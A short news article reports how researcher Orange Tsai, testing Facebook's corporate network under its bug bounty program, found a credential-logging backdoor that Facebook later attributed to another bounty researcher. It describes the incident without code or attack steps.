Facebook hacker finds leak containing employees’ usernames and passwords


Hackers were able to gain access to Facebook’s internal network for months, stealing the usernames and passwords of hundreds of employees.

Details of the hack were discovered by Taiwanese security researcher Orange Tsai, who was carrying out ‘penetration testing’ in order to try and discover bugs and breach Facebook’s internal corporate network.

Ethical or ‘whitehat’ hackers often carry out this type of testing to find bugs and check the security of a website. Tsai’s testing was carried out as part of the company’s Bug Bounty program where Facebook pays hackers who discover and disclose vulnerabilities in its servers for via its site.

During testing, Tsai discovered a piece of malware that had been designed to steal the login details of Facebook staff.

Tsai found that hackers had first compromised Facebook’s corporate network in July 2015, then again in September and most recently in February 2016.

“While collecting vulnerability details and evidences for reporting to Facebook, I found some strange things on web log”.

“The hacker created a proxy on the credential page to log the credentials of Facebook employees. These logged passwords were stored under web directory for the hacker to use every once in awhile”, Tsai said.

Tsai claimed that the leaked details could have given hackers access to staff emails, VPNs and internal file transfer tools.

Tsai discovered the security breach on February 5 and alerted Facebook. An internal investigation was then carried out which finished on April 20, allowing for details of the hack to be published.

Tsai was reportedly paid $10,000 by Facebook for discovering the hack.

In a statement, Reginaldo, a member of Facebook’s security team said: “we’re really glad Orange reported this to us”.

Reginaldo claimed that the security was the result of testing from another whitehat Facebook hacker.

“After incident response, we determined that the activity Orange detected was in fact from another researcher who participates in our bounty program. Neither of them were able to compromise other parts of our infra-structure so, the way we see it, it’s a double win: two competent researchers assessed the system, one of them reported what he found to us and got a good bounty, none of them were able to escalate access.”



Comments are closed.